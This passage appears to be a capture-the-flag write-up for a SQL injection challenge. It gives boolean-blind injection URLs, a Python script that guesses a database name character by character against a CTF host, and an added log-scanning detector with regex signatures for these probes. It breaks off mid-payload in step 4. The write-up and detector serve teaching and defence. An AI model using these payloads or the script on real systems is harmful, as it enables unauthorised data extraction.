CTF challenge this exploit was used on: 简单的sql注入之3 (Simple SQL Injection 3)
Steps:
First, test whether the injection is boolean-based blind (the responses to the following requests should differ only in a true/false way; %23 is a URL-encoded #, which comments out the rest of the query):
http://localhost/index.php?id=2
http://localhost/index.php?id=2'
http://localhost/index.php?id=2''
http://localhost/index.php?id=2%23
http://localhost/index.php?id=2' and 1=1#
If it is boolean-based blind, proceed as follows:
1. Get the length of the database name
http://localhost/index.php?id=2' and length(database())>1%23
2. Get the database name
Payload (position {0}, ASCII value {1}):
http://localhost/index.php?id=2' and ascii(substr(database(), {0}, 1))={1}%23
Python script to retrieve it automatically (the response length of the known-true request is used as the oracle):
import requests


def getDBName(DBName_len):
    DBName = ""
    # Baseline: a request whose condition is known to be true. Its response
    # length is the "true" oracle that every guess is compared against.
    success_url = "http://ctf5.shiyanbar.com/web/index_3.php?id=2"
    success_response_len = len(requests.get(success_url).text)
    url_template = "http://ctf5.shiyanbar.com/web/index_3.php?id=2' and ascii(substr(database(),{0},1))={1}%23"
    # Candidate characters; note that '_' and other symbols are not included,
    # so a name containing them will stop the loop early.
    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    print("Start to retrieve database name...")
    print("Success_response_len is: ", success_response_len)
    for i in range(1, DBName_len + 1):
        print("Number of letter: ", i)
        tempDBName = DBName
        for char in chars:
            print("Test letter " + char)
            char_ascii = ord(char)
            url = url_template.format(i, char_ascii)
            response = requests.get(url)
            # Same length as the known-true response means the guess was right.
            if len(response.text) == success_response_len:
                DBName += char
                print("DBName is: " + DBName + "...")
                break
        # No candidate matched at this position: the alphabet is too small.
        if tempDBName == DBName:
            print("Letters too little! Program ended.")
            return
    print("Retrieve completed! DBName is: " + DBName)


getDBName(5)
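From the defender's side, the probes in steps 1 through 3 leave a very recognisable trail in the web server access log: hundreds of requests to one endpoint whose query string contains ascii(substr(...)), length(database()) or information_schema, with the response size flipping between two values. The following detector is an added example, not part of the original write-up; it URL-decodes each request line before matching (so %23 and %27 encodings do not hide the payload) and counts probe hits per client IP over a few constructed log lines.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Signatures of the boolean-blind probes used in the write-up, applied to the
# URL-decoded request so that %23 / %27 / %20 encodings do not evade them.
BLIND_PROBE_PATTERNS = [
    re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),           # ascii(substr(...)) char test
    re.compile(r"\blength\s*\(\s*database\s*\(\s*\)", re.I),   # length(database())
    re.compile(r"information_schema\.(tables|columns)", re.I), # schema enumeration
    re.compile(r"'\s*and\s+1\s*=\s*1\s*(#|--)", re.I),         # the classic truth probe
]

# Constructed sample lines in common log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=2' HTTP/1.1" 200 411
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=2'%20and%201=1%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=2'%20and%20length(database())>1%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=2'%20and%20ascii(substr(database(),1,1))=119%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?id=2'%20and%20ascii(substr(database(),1,1))=120%23 HTTP/1.1" 200 411
192.168.1.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?id=3 HTTP/1.1" 200 530
"""

# client, request path, status, response size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')


def scan_log(text):
    """Return {client_ip: number_of_probe_requests} for clients sending blind-SQLi probes."""
    hits = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the scan
        ip, raw_url, _status, _size = m.groups()
        decoded = unquote_plus(raw_url)
        if any(p.search(decoded) for p in BLIND_PROBE_PATTERNS):
            hits[ip] += 1
    return dict(hits)


def flag_clients(text, threshold=2):
    """Client IPs whose probe count reaches the threshold, sorted for stable output."""
    return sorted(ip for ip, n in scan_log(text).items() if n >= threshold)
```

A single hit can be a false positive (security scanners, odd but legitimate input), so alert on the per-client count rather than on individual lines.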
3. Get the table name length
Payload:
http://localhost/index.php?id=2' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>0 %23
4. Get the table name
Much like getting the database name in step 2, with the payload changed slightly:
http://localhost/index.php?id=2' and ascii(substr((sel